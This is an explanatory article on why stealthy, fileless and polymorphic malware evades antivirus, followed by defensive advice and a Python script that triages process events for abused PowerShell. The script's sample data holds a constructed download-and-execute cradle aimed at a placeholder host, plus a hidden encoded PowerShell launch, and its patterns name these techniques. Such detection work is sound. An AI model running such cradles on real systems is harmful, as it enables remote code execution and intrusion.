TL;DR
Yes, some malware is deliberately designed to be so slow-moving or subtle that it’s impractical for antivirus (AV) vendors to detect it reliably. This isn’t necessarily a failing of the AV software itself, but a trade-off between detection rates, system performance and resource costs. We’ll look at why this happens and what you can do about it.
Why Malware Can Go Undetected
- Slow & Low Techniques: Some malware authors use techniques that spread very slowly or make tiny changes over long periods. AV relies on identifying patterns of malicious behaviour, but if the behaviour is gradual enough, it can be missed.
- Example: A piece of software that subtly alters a single byte in a file every few days might not trigger any alarms.
- Resource-Intensive Analysis: Fully analysing all files and system activity for these kinds of threats requires significant computing power and time. AV vendors have to balance this against the need to keep systems running smoothly.
- Imagine scanning every single file on millions of computers, looking for tiny changes – it’s a huge task!
- Targeted Attacks: Highly targeted attacks (Advanced Persistent Threats or APTs) often use custom malware that isn’t widely distributed. AV signatures are built based on common threats; unique, low-volume malware is harder to identify.
- Polymorphism & Metamorphism: Malware can change its code each time it infects a system (polymorphism) or even rewrite itself entirely (metamorphism). This makes signature-based detection less effective. AV vendors try to keep up with these changes, but it’s a constant arms race.
- Fileless Malware: This type of malware operates in memory and doesn’t write files to disk, making traditional file scanning ineffective. It often uses legitimate system tools (like PowerShell) for malicious purposes.
- Detecting this requires monitoring process behaviour rather than looking at files.
What Can You Do?
- Layer Your Security: Don’t rely on AV alone.
- Firewall: Block unwanted network connections.
- Intrusion Detection/Prevention Systems (IDS/IPS): Monitor for suspicious activity.
- Endpoint Detection and Response (EDR): Provides more advanced monitoring and response capabilities than traditional AV.
- Keep Software Updated: Patch vulnerabilities promptly.
- Use a vulnerability scanner to identify missing updates:
nmap --script vuln
- Regular Backups: If you get infected, you can restore your system from a clean backup.
- User Awareness Training: Teach users to identify phishing emails and suspicious links.
- Behavioural Analysis Tools: Look for tools that monitor process behaviour and flag anomalies.
- These tools are better at detecting fileless malware and slow-moving threats.
- Sandboxing: Run suspicious files in a safe, isolated environment (a sandbox) to see what they do before allowing them on your system.
- Threat Intelligence Feeds: Subscribe to threat intelligence feeds to stay informed about the latest threats and indicators of compromise (IOCs).
- These feeds can help you proactively block malicious domains, IP addresses, and file hashes.
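The fileless-malware point above says detection has to come from process behaviour rather than files, and the behavioural-analysis item says the tools should flag anomalies. The following is an added example of what such a check looks like, not code from the original answer: it scores constructed, Sysmon-style process-creation records for a script host launched by an Office parent or started with visibility-reducing flags. Field names and the sample events are assumptions.

```python
"""Process-behaviour triage for fileless / living-off-the-land activity.

Added example: the events below are constructed process-creation records,
not real telemetry, and the field names are assumptions.
"""
import re
from dataclasses import dataclass

# Script interpreters commonly abused for in-memory execution (the answer names PowerShell).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Parents that should almost never launch a script host on a workstation.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
# Command-line traits that hide content or activity from the user.
EVASION_FLAGS = [
    (re.compile(r"-(enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-(w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"(downloadstring|iex|invoke-expression)", re.I), "in-memory download/exec"),
]


@dataclass
class ProcEvent:
    parent: str   # image name of the parent process
    image: str    # image name of the new process
    cmdline: str  # full command line of the new process


def score_event(ev: ProcEvent) -> list[str]:
    """Return the behavioural findings for one process-creation event (empty if benign)."""
    findings = []
    if ev.image.lower() in SCRIPT_HOSTS:
        if ev.parent.lower() in OFFICE_PARENTS:
            findings.append(f"script host spawned by {ev.parent}")
        for pattern, label in EVASION_FLAGS:
            if pattern.search(ev.cmdline):
                findings.append(label)
    return findings


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> findings, keeping only events that produced at least one."""
    return {i: f for i, ev in enumerate(events) if (f := score_event(ev))}


# Constructed sample events: one benign admin use of PowerShell, one Office-spawned
# hidden/encoded launch, one ordinary service host, one download-and-execute cradle.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe Get-Process"),
    ProcEvent("winword.exe", "powershell.exe", "powershell.exe -w hidden -enc SQBFAFgA..."),
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent("cmd.exe", "powershell.exe",
              "powershell.exe -nop Invoke-Expression (DownloadString 'http://example.invalid/x')"),
]

if __name__ == "__main__":
    for i, f in triage(SAMPLE_EVENTS).items():
        print(f"event {i}: {SAMPLE_EVENTS[i].parent} -> {SAMPLE_EVENTS[i].image}: {', '.join(f)}")
```

A real deployment would feed these rules from an EDR or Sysmon event stream and tune the allow-lists per environment, since legitimate admin scripts also use encoded commands.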
Final Thoughts
No cybersecurity solution is perfect. Some malware *will* inevitably slip through the cracks. The key is to build a layered defence strategy that makes it harder for attackers to succeed and provides multiple opportunities to detect and respond to threats.